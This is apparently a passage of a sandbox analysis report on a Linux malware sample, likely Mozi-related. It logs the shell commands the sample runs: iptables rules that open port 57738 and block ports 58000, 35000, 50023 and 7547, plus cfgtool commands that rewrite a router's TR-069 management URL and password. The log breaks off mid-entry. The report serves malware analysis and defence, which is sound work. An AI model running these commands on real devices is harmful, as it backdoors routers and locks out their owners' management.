                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4658 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4662 Parent PID: 4658

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4662 Parent PID: 4658

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4666 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4666 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4675 Parent PID: 4666

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4675 Parent PID: 4666

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4708 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4708 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4710 Parent PID: 4708

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4710 Parent PID: 4708

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4711 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4711 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4714 Parent PID: 4711

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4714 Parent PID: 4711

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4723 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4723 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4732 Parent PID: 4723

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4732 Parent PID: 4723

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4752 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4752 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4763 Parent PID: 4752

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4763 Parent PID: 4752

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4783 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4783 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4787 Parent PID: 4783

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4787 Parent PID: 4783

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4589 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:14
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4594 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:19
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4598 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4857 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4857 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4860 Parent PID: 4857

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4860 Parent PID: 4857

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4869 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4869 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4878 Parent PID: 4869

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4878 Parent PID: 4869

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4892 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4892 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:29
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4897 Parent PID: 4892

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4897 Parent PID: 4892

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4899 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4899 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4909 Parent PID: 4899

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4909 Parent PID: 4899

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4929 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4929 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: i PID: 4935 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4935 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: i PID: 4937 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4937 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4940 Parent PID: 4937

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4940 Parent PID: 4937

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4949 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4949 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4959 Parent PID: 4949

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4959 Parent PID: 4949

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 4980 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4980 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4994 Parent PID: 4980

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4994 Parent PID: 4980

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5009 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5009 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5012 Parent PID: 5009

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5012 Parent PID: 5009

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5018 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5018 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5028 Parent PID: 5018

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5028 Parent PID: 5018

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5047 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5047 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5050 Parent PID: 5047

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5050 Parent PID: 5047

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5052 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5052 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5062 Parent PID: 5052

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5062 Parent PID: 5052

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5084 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5084 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5091 Parent PID: 5084

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5091 Parent PID: 5084

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5097 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5097 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
